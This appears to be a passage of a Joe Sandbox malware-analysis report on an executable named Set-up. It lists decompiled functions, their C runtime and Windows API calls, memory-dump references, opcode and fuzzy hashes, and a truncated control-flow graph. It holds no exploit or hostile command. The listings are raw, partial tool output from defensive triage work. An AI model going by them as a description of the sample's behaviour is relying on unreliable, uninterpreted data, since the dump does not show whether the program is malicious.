                                                                                              • wcsncpy_s.MSVCR100(?,000000FF,00000000,?,?,?,?,?,?,6BB6A24E,?,?,?,?,?,?), ref: 6BB9129B
                                                                                              • wcsncpy_s.MSVCR100(?,000000FF,?,?,?,?,?,?,?,6BB6A24E,?,?,?,?,?,?), ref: 6BB912B8
                                                                                              • _errno.MSVCR100(?,?,?,?,?,6BB6A24E,?,?,?,?,?,?,?,?,?), ref: 6BB91321
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,6BB6A24E,?,?,?,?,?,?,?,?,?), ref: 6BB9132B
                                                                                              • _errno.MSVCR100(?,?,?,?,?,6BB6A24E,?,?,?,?,?,?,?,?,?), ref: 6BB9133C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcsncpy_s$_errno$_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2268458229-0
                                                                                              • Opcode ID: c1f5240053b108a06b6e3bafab692a3026b47fb90539e20584dc0318cf0e9ea9
                                                                                              • Instruction ID: 34e65660e84495fc5d44678f5fdabddacc1c479ae660a6bb90728ac47568a86a
                                                                                              • Opcode Fuzzy Hash: c1f5240053b108a06b6e3bafab692a3026b47fb90539e20584dc0318cf0e9ea9
                                                                                              • Instruction Fuzzy Hash: 3B711B31D446F6EB9F18AF18984009D37BAEBA778476982BAEC1492180F3798C509F81
                                                                                              Function 6BB643A6 Relevance: 12.2, APIs: 8, Instructions: 223COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • wcsncpy_s.MSVCR100(?,?,?,00000000), ref: 6BB644B2
                                                                                              • wcsncpy_s.MSVCR100(?,?,00000000,?), ref: 6BB644D9
                                                                                              • wcsncpy_s.MSVCR100(?,00000003,?,00000002), ref: 6BB6452E
                                                                                              • wcsncpy_s.MSVCR100(?,?,?,?), ref: 6BB64562
                                                                                              • _errno.MSVCR100 ref: 6BB913A1
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB913AB
                                                                                              • _errno.MSVCR100 ref: 6BB913BC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcsncpy_s$_errno$_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2268458229-0
                                                                                              • Opcode ID: 482527dddfd8eb0907e252b437bd19494a6dfea260ba71937d5eb1d190559979
                                                                                              • Instruction ID: 6992d44e77ce13f5f3c55c702ac2e766a43ffa2d1464ca913579ad494335f865
                                                                                              • Opcode Fuzzy Hash: 482527dddfd8eb0907e252b437bd19494a6dfea260ba71937d5eb1d190559979
                                                                                              • Instruction Fuzzy Hash: BD711831D04296EBDF189F28C8620AE3BB6FBA578472581BAEC1492510F779CD91CB81
                                                                                              Function 6BB607A7 Relevance: 10.6, APIs: 7, Instructions: 57COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 6BBDC14C
                                                                                              • _crt_debugger_hook.MSVCR100(00000001), ref: 6BBDC159
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6BBDC161
                                                                                              • UnhandledExceptionFilter.KERNEL32(6BBDC198), ref: 6BBDC16C
                                                                                              • _crt_debugger_hook.MSVCR100(00000001), ref: 6BBDC17D
                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 6BBDC188
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 6BBDC18F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 3369434319-0
                                                                                              • Opcode ID: 6be06fd46e0e742a05616144448bce0b8167cea5d597b826435398d6a205cfda
                                                                                              • Instruction ID: a03b2083ee87ad6c90c2c3727550b9cc982ad0854252d962c2489cd5b1973231
                                                                                              • Opcode Fuzzy Hash: 6be06fd46e0e742a05616144448bce0b8167cea5d597b826435398d6a205cfda
                                                                                              • Instruction Fuzzy Hash: DA21DDB9805248AFDF48DF68D4496693BF4BB0A304F02415EE40A83350E7B6DA80AF25
                                                                                              Function 6BB6750C Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,00000080,?,?,00000000), ref: 6BB6753C
                                                                                              • GetLocaleInfoW.KERNEL32(?,?,00000000,?,?,?,00000000), ref: 6BB6758E
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,?,00000000,00000000,?,?,00000000), ref: 6BB675AC
                                                                                              • _freea_s.MSVCR100(00000000,?,?,00000000), ref: 6BB675B5
                                                                                              • malloc.MSVCR100(00000008,?,?,00000000), ref: 6BB91418
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale$ByteCharMultiWide_freea_smalloc
                                                                                              • String ID:
                                                                                              • API String ID: 221122905-0
                                                                                              • Opcode ID: c2823f9cfd69d3619dceed7a42ac52ca845905bb666ab9e15247e45b5e37a1a4
                                                                                              • Instruction ID: 48118505261b660dbc6815aa3d06d761f8ee27f2fbcd00a4d7b76f0c36d34357
                                                                                              • Opcode Fuzzy Hash: c2823f9cfd69d3619dceed7a42ac52ca845905bb666ab9e15247e45b5e37a1a4
                                                                                              • Instruction Fuzzy Hash: BF21F931601164BFCF019F66DC85D9F7BA9EF497A471040A5F92896250E779CD50CBA0
                                                                                              Function 6BB652E4 Relevance: 7.6, APIs: 5, Instructions: 85COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _errno.MSVCR100(74DE8410,?,?,6BB6726E,?,0000000A,00000000), ref: 6BB878BE
                                                                                              • _invalid_parameter_noinfo.MSVCR100(74DE8410,?,?,6BB6726E,?,0000000A,00000000), ref: 6BB878C8
                                                                                              • _errno.MSVCR100(0000009C,74DE8410,?,?,6BB6726E,?,0000000A,00000000), ref: 6BB878D4
                                                                                              • _invalid_parameter_noinfo.MSVCR100(0000009C,74DE8410,?,?,6BB6726E,?,0000000A,00000000), ref: 6BB878DE
                                                                                              • _errno.MSVCR100(0000009C,74DE8410,?,?,6BB6726E,?,0000000A,00000000), ref: 6BB878EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2819658684-0
                                                                                              • Opcode ID: 55d666dd8a699c4ebf395b86ab4b46f2912cd88d49c6b26b25ca133e50ddebef
                                                                                              • Instruction ID: 0e7aac3a35c5f3b123573e731936b9f2b0e14a86df913110e5b4de9845ca35ad
                                                                                              • Opcode Fuzzy Hash: 55d666dd8a699c4ebf395b86ab4b46f2912cd88d49c6b26b25ca133e50ddebef
                                                                                              • Instruction Fuzzy Hash: 1F2137316483C9DFD3064E3A98D079D7B51EB47B88F20417ED2864B242E7F88852CBA6
                                                                                              Function 6BB69D65 Relevance: 3.4, APIs: 2, Instructions: 398COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _errno.MSVCR100(00000000), ref: 6BB6997A
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000000), ref: 6BB69985
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2959964966-0
                                                                                              • Opcode ID: c0b8f42afb0011b58e21b487e3770daf3f000053a2d362f4dfdfdfd78820ad51
                                                                                              • Instruction ID: 762cc8f90601a40e3f12de4cc0b0a37747e2b4efede0b97bc11fb39d22703f34
                                                                                              • Opcode Fuzzy Hash: c0b8f42afb0011b58e21b487e3770daf3f000053a2d362f4dfdfdfd78820ad51
                                                                                              • Instruction Fuzzy Hash: B7F14671D04299CFDB24CFA9C4802EDBBB1FF49794F20816AE455AB285E7B89881CF41
                                                                                              Function 6BB6867F Relevance: 3.4, APIs: 2, Instructions: 391COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _errno.MSVCR100(?,?), ref: 6BB68439
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?), ref: 6BB68444
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2959964966-0
                                                                                              • Opcode ID: d69f0cd6b6b82c5d60474aed5869f8a48f43f0dfd2d9939d9e96050470d987ce
                                                                                              • Instruction ID: 9417cde36919da9003b14b40479f65d3a6b88dae56479806a3b91e7866c5e41f
                                                                                              • Opcode Fuzzy Hash: d69f0cd6b6b82c5d60474aed5869f8a48f43f0dfd2d9939d9e96050470d987ce
                                                                                              • Instruction Fuzzy Hash: 1EE14971D14299CFDB24DFA8C8402DDB7B1FF4A794F20816BD425AB284E7388986CF95
                                                                                              Function 6BB9ECCD Relevance: 2.7, Strings: 2, Instructions: 248COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $$$
                                                                                              • API String ID: 0-233714265
                                                                                              • Opcode ID: 6cd348a5dd217ca1178e9f3aee923514d3b097b204b1d317a7db7ec938d5a87d
                                                                                              • Instruction ID: 075fbf55e558697a8e07e7b4b19930ab03d5d8594b55e5353b627cf5ca084d72
                                                                                              • Opcode Fuzzy Hash: 6cd348a5dd217ca1178e9f3aee923514d3b097b204b1d317a7db7ec938d5a87d
                                                                                              • Instruction Fuzzy Hash: 40A15970A187619FC314DF29D19091EBBF2FF8A704F11896EE4894B612C734E899CBD2
                                                                                              Function 6BB80919 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8bb9164c59b82a43f74e5b5438148b6fa86d19d374e7bbab9f73c52d3d62bd7b
                                                                                              • Instruction ID: 64fbc723b54ed9e7d00a53a3afdc6b18af123427e1488d6b628ec1d060330835
                                                                                              • Opcode Fuzzy Hash: 8bb9164c59b82a43f74e5b5438148b6fa86d19d374e7bbab9f73c52d3d62bd7b
                                                                                              • Instruction Fuzzy Hash: 50320431D2AF914DEB239534C822336A35DEFB73D4F15D727E829B6996EB29C4834200
                                                                                              Function 6BB7911E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3b54018450618b6d98d710f63ac2d4ca2ff4f35ec8798a48f981ad1f899916d6
                                                                                              • Instruction ID: 06cac013a746d549803e2b43548ffb3aa98384487724037528cd46f6f8832cca
                                                                                              • Opcode Fuzzy Hash: 3b54018450618b6d98d710f63ac2d4ca2ff4f35ec8798a48f981ad1f899916d6
                                                                                              • Instruction Fuzzy Hash: 73B1EF30D2AF604DC76396398821336B65CAFBB2C6F52D72BFC6631D52EB22C5834640
                                                                                              Function 6BB697A0 Relevance: 1.8, Strings: 1, Instructions: 525COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID: 0-3916222277
                                                                                              • Opcode ID: 9f909e78fd83290681f2be132dccdb60e93640ff86ffe020c2e955cc73491680
                                                                                              • Instruction ID: c3f20e6d84fac90e6a6533cce8b5db7f70eaa9446961bc3e6fa555241cc3858b
                                                                                              • Opcode Fuzzy Hash: 9f909e78fd83290681f2be132dccdb60e93640ff86ffe020c2e955cc73491680
                                                                                              • Instruction Fuzzy Hash: 5312B172E106299BEF04CF68D8506ECB7B2FBCD364F298679D821B7280D3756A05CB50
                                                                                              Function 6BB68F83 Relevance: 1.8, Strings: 1, Instructions: 521COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID: 0-3916222277
                                                                                              • Opcode ID: 3c9735c5119ce89384d0c19757369088e9820b9997f5bfd0cbbb0300de3609c2
                                                                                              • Instruction ID: 7d9f442e7325ba488334261be567d6036220448dbfc1233d88d85004d1b4e1ef
                                                                                              • Opcode Fuzzy Hash: 3c9735c5119ce89384d0c19757369088e9820b9997f5bfd0cbbb0300de3609c2
                                                                                              • Instruction Fuzzy Hash: A912A172E106198FEF04DF68E8406ECB7B2FBCE324F258669D922B7284D7756905CB50
                                                                                              Function 6BB63A1C Relevance: 1.4, Strings: 1, Instructions: 188COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: N@
                                                                                              • API String ID: 0-1509896676
                                                                                              • Opcode ID: 3e3bb3f6aa99e6c93c60c160689f60ed24c4f13bccc066950e67d947502959b0
                                                                                              • Instruction ID: 0b6f7d327b97c59aa076423873295ea1cd95c76da496564499689b10da9ce126
                                                                                              • Opcode Fuzzy Hash: 3e3bb3f6aa99e6c93c60c160689f60ed24c4f13bccc066950e67d947502959b0
                                                                                              • Instruction Fuzzy Hash: ED718971E043458FDB18CF49C4946AEBBB2FF85300F1AC1AED9195B362D7B99984CB80
                                                                                              Function 6BB67093 Relevance: .5, Instructions: 489COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0c1a407eed5521382d5566c5be072b29c2c2476b62912df008432b27dd7b8584
                                                                                              • Instruction ID: 3644a6e2b5382fe18005c3e969cd0cb5a1e19126ec813bd564a3f4d3233db6f2
                                                                                              • Opcode Fuzzy Hash: 0c1a407eed5521382d5566c5be072b29c2c2476b62912df008432b27dd7b8584
                                                                                              • Instruction Fuzzy Hash: 7E027533D4D6F24B8B764EFA44D0216BBB0DE02B9031B86E5EDD03F196E15ADD1686D0
                                                                                              Function 6BB521F0 Relevance: .1, Instructions: 76COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                              • Instruction ID: 019465f6f9e02e0fc0062f8e302c27189e91c114850a8fb19be0eb303bc783ff
                                                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                              • Instruction Fuzzy Hash: 2B115B7F2039CA43D6808D6DD4B07B7E395FBD632472843FAC0618B658C12BE0759902
                                                                                              Function 6BB733B8 Relevance: 54.6, APIs: 30, Strings: 1, Instructions: 367COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1172 6bb733b8-6bb73405 1173 6bb73406-6bb73408 1172->1173 1174 6bb73432-6bb73435 1173->1174 1175 6bb7340a-6bb7341a call 6bb628e5 1173->1175 1177 6bb73438 call 6bb61ee1 1174->1177 1175->1173 1178 6bb7343d-6bb73446 1177->1178 1180 6bb7344c-6bb7345f call 6bb6fd24 1178->1180 1181 6bb88027-6bb88042 call 6bb607b5 call 6bb6aafe 1178->1181 1186 6bb8804a-6bb8804d 1180->1186 1187 6bb73465-6bb73478 call 6bb628e5 1180->1187 1181->1186 1191 6bb8804f 1186->1191 1192 6bb88093-6bb880a4 call 6bb6014e 1186->1192 1196 6bb7347a-6bb73485 call 6bb628e5 1187->1196 1197 6bb73488-6bb7348d 1187->1197 1195 6bb88054 1191->1195 1206 6bb880ab-6bb880b4 1192->1206 1199 6bb88054 call 6bbdae5c 1195->1199 1196->1197 1200 6bb88059-6bb88060 1197->1200 1202 6bb73493-6bb73499 1197->1202 1199->1200 1203 6bb88076-6bb8807a 1200->1203 1205 6bb7349b-6bb734a4 1202->1205 1207 6bb8807c-6bb88083 1203->1207 1208 6bb88062-6bb88073 call 6bb628e5 1203->1208 1209 6bb734a6-6bb734be call 6bb629c7 1205->1209 1210 6bb7350e-6bb73511 1205->1210 1211 6bb880e1-6bb880e9 1206->1211 1212 6bb880b6-6bb880b9 1206->1212 1207->1206 1215 6bb88085-6bb88091 call 6bb71201 1207->1215 1208->1203 1227 6bb734c4-6bb734d0 call 6bb628e5 1209->1227 1228 6bb8827c-6bb88283 1209->1228 1216 6bb734d3-6bb734d7 1210->1216 1214 6bb88117-6bb8811a 1211->1214 1218 6bb880bb-6bb880be 1212->1218 1224 6bb880eb-6bb880ef 1214->1224 1225 6bb8811c-6bb8812d 1214->1225 1215->1192 1215->1206 1221 6bb73513-6bb73524 1216->1221 1222 6bb734d9-6bb734f4 call 6bb629c7 1216->1222 1218->1211 1219 6bb880c0-6bb880df call 6bb628e5 1218->1219 1219->1211 1219->1218 1233 6bb7352a-6bb7352c 1221->1233 1234 6bb881a7-6bb881c9 call 6bb51e80 1221->1234 1222->1228 1250 6bb734fa-6bb7350b call 6bb628e5 1222->1250 1224->1225 1231 6bb880f1-6bb880f7 1224->1231 1235 6bb8814e-6bb88150 1225->1235 1227->1216 1228->1195 1231->1225 1242 6bb880f9-6bb880fe 1231->1242 1243 6bb73532 1233->1243 1244 6bb88257-6bb8825c 1233->1244 1254 6bb881cb-6bb881e7 call 6bb629c7 1234->1254 1255 6bb88201-6bb88205 1234->1255 1239 6bb8812f-6bb88149 call 6bb628e5 call 6bb62cb6 1235->1239 1240 6bb88152-6bb88155 1235->1240 1278 6bb8819b-6bb881a5 1239->1278 1279 6bb8814b 1239->1279 1247 6bb88158-6bb8815a 1240->1247 1242->1225 1251 6bb88100-6bb88114 call 6bb628e5 1242->1251 1253 6bb73534-6bb7353b 1243->1253 1248 6bb8825e-6bb88263 1244->1248 1249 6bb88266-6bb88268 1244->1249 1256 6bb8815b call 6bb61ee1 1247->1256 1248->1249 1261 6bb88270-6bb88276 call 6bb6014e 1249->1261 1250->1210 1251->1214 1260 6bb73541-6bb7354a 1253->1260 1253->1261 1254->1228 1282 6bb881ed-6bb881ff call 6bb628e5 1254->1282 1255->1233 1266 6bb8820b-6bb8821e call 6bb629c7 1255->1266 1265 6bb88160-6bb8816c 1256->1265 1262 6bb73555-6bb7355f 1260->1262 1263 6bb7354c-6bb73554 call 6bb6014e 1260->1263 1261->1228 1273 6bb73560 call 6bb607a7 1262->1273 1263->1262 1265->1205 1275 6bb88172-6bb88196 call 6bb6014e call 6bb607b5 call 6bb6aafe 1265->1275 1266->1228 1287 